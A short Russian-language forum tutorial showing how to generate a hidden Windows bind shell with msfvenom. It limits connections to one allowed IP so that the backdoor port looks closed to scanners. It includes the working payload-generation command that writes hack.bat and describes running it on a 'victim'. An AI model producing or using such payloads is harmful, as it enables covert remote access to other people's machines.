Привет колеги. Это будет коротенький пост из серии MustKnow(Нужно Знать). Как бы ничего нового но я посчитал нужным кинуть в копилку форума описания этого метода.
Ничего нового мы изобретать с вами не будем,а воспользуемся обычной генерацией полезной нагрузки средствами msfvenom,и я лишь немного прокомментирую этот способ получения BIND SHELL-а.
И так, давайте для начала посмотрим все опции которые возможны при создании нашего скрытого бинд шелла,а так же глянем описания(Рекомендую всегда читать описания!):
Код:
msfvenom -p windows/shell_hidden_bind_tcp --payload-options
Как видим из списка опций - есть обязательный параметр AHOST ([Allowed IP Adress|Разрешенный айпишник]) И в описании читаем о том ,что мы поднимаем листенер на порту ,которой указывается опционально "параметр LPORT", и если мы будем стучатся на этот порт с айпишника который мы указали в параметре AHOST - то нам будет прилетать шелл,но если это будет любой другой айпи адресс - то удаленная машина будет отвечать RST пакетом и порт для соединения будет закрыт.Таким образом обнаружить открытый порт никто кроме нас не сможет(ну если конечно с нашего айпишника никто не будет сканит)
Давайте все же протестируем. Создадим полезную нагрузку:
Код:
msfvenom -p windows/shell_hidden_bind_tcp AHOST=192.168.137.137 lport=4444 -f psh-cmd -o hack.bat
lport -- порт для листенера
-f psh-cmd -- формат полезной нагрузки ( в моем случает однострочная команда для powershell)
Я специально для наглядности указал не свой айпи что бы показать как это работает.
Дальше запустим на стороне жертвы и попробуем просканировать на 4444 порт.
Как видите порт закрыт. Давайте сменим свой айпи на 192.168.137.137 и попробуем снова.
Проверим шелл:
Все работает с указанного айпи)
Надеюсь кому то будет полезным)
Всем спасибо)